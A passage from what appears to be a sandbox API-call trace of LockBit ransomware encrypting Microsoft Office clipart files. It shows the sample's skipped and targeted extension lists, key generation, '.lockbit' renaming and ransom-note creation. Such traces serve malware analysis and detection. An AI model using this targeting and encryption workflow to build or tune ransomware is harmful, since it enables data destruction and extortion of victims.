"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.003] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.003] malloc (_Size=0x40068) returned 0x3df0008 [0139.003] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=17332) returned 1 [0139.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.004] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.008] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.008] malloc (_Size=0xa6) returned 0x77d7a8 [0139.008] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.010] free (_Block=0x77d7a8) [0139.010] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.010] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.010] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105530.WMF", cAlternateFileName="")) returned 1 [0139.010] lstrcmpiW (lpString1=".", lpString2="J0105530.WMF") returned -1 [0139.010] lstrcmpiW (lpString1="..", lpString2="J0105530.WMF") returned -1 [0139.010] PathFindExtensionW (pszPath="J0105530.WMF") returned=".WMF" [0139.010] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.010] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.010] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.010] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.011] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.011] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105530.WMF") returned 1 [0139.012] lstrcmpiW (lpString1="ntldr", lpString2="J0105530.WMF") returned 1 [0139.012] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105530.WMF") returned 1 [0139.012] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105530.WMF") returned -1 [0139.012] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105530.WMF") returned -1 [0139.012] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105530.WMF") returned 1 [0139.012] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105530.WMF") returned -1 [0139.012] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.012] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF") returned=".WMF" [0139.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.012] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.012] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.013] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.013] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.lockbit") returned 72 [0139.013] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.014] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.014] malloc (_Size=0x40068) returned 0x3df0008 [0139.014] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7384) returned 1 [0139.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.015] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.020] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.020] malloc (_Size=0xa6) returned 0x77d7a8 [0139.020] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.021] free (_Block=0x77d7a8) [0139.021] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105530.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.021] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.021] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.021] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x542c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105588.WMF", cAlternateFileName="")) returned 1 [0139.021] lstrcmpiW (lpString1=".", lpString2="J0105588.WMF") returned -1 [0139.021] lstrcmpiW (lpString1="..", lpString2="J0105588.WMF") returned -1 [0139.021] PathFindExtensionW (pszPath="J0105588.WMF") returned=".WMF" [0139.021] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.021] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.022] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.022] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105588.WMF") returned 1 [0139.022] lstrcmpiW (lpString1="ntldr", lpString2="J0105588.WMF") returned 1 [0139.022] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105588.WMF") returned 1 [0139.023] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105588.WMF") returned -1 [0139.023] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105588.WMF") returned -1 [0139.023] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105588.WMF") returned 1 [0139.023] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105588.WMF") returned -1 [0139.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF") returned=".WMF" [0139.023] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.023] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.023] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.024] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.024] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.024] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.lockbit") returned 72 [0139.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.024] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.024] malloc (_Size=0x40068) returned 0x3df0008 [0139.024] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21548) returned 1 [0139.024] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.025] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.029] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.029] malloc (_Size=0xa6) returned 0x77d7a8 [0139.029] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.039] free (_Block=0x77d7a8) [0139.039] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105588.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.039] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.039] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x21e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105600.WMF", cAlternateFileName="")) returned 1 [0139.039] lstrcmpiW (lpString1=".", lpString2="J0105600.WMF") returned -1 [0139.039] lstrcmpiW (lpString1="..", lpString2="J0105600.WMF") returned -1 [0139.039] PathFindExtensionW (pszPath="J0105600.WMF") returned=".WMF" [0139.039] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.039] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.040] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.040] lstrcmpiW (lpString1=".ini", 